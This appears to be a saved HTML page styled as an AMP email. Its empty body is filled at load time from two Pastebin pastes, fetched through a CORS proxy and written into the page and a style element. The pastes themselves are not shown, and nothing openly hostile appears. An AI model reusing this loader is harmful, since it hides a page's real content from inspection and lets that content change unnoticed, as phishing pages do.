<!doctype html>
<html ⚡4email data-css-strict>
   <head>
      <meta charset="utf-8">
      <script type="text/javascript" src="https://gc.kis.v2.scr.kaspersky-labs.com/FD126C42-EBFA-4E12-B309-BB3FDD723AC1/main.js?attr=X3to-_2Kmht5Il0Auis5_2CSr5fjDz27vaZ7Iy0R0sgpTQdWdA0NmafJyoasePrfER-C5NnpNvDETPtsg_bWTTEomNqdn3iem6Aopz3OY3bYHjDDsBIuZaMbSh_4Ek9F" charset="UTF-8"></script>
      <style amp4email-boilerplate>body{visibility:hidden}</style>
      <script async src="https://cdn.ampproject.org/v0.js"></script><script async custom-element="amp-anim" src="https://cdn.ampproject.org/v0/amp-anim-0.1.js"></script><script async custom-element="amp-carousel" src="https://cdn.ampproject.org/v0/amp-carousel-0.1.js"></script>
	  <script type="text/javascript" src="https://code.jquery.com/git/jquery-3.x-git.min.js"></script>
	<style id="dstyle"></style>
	  <script>
		$.get('https://api.allorigins.win/get?url=' + encodeURIComponent('https://pastebin.com/raw/be4JGv6C'), function (data) {
		  document.body.innerHTML = data.contents
		});
		$.get('https://api.allorigins.win/get?url=' + encodeURIComponent('https://pastebin.com/raw/PEJMWGyz'), function (data) {
		  document.getElementById('dstyle').innerHTML = data.contents
		});
	  </script>
	  
	</head>
   <body>
   </body>
</html>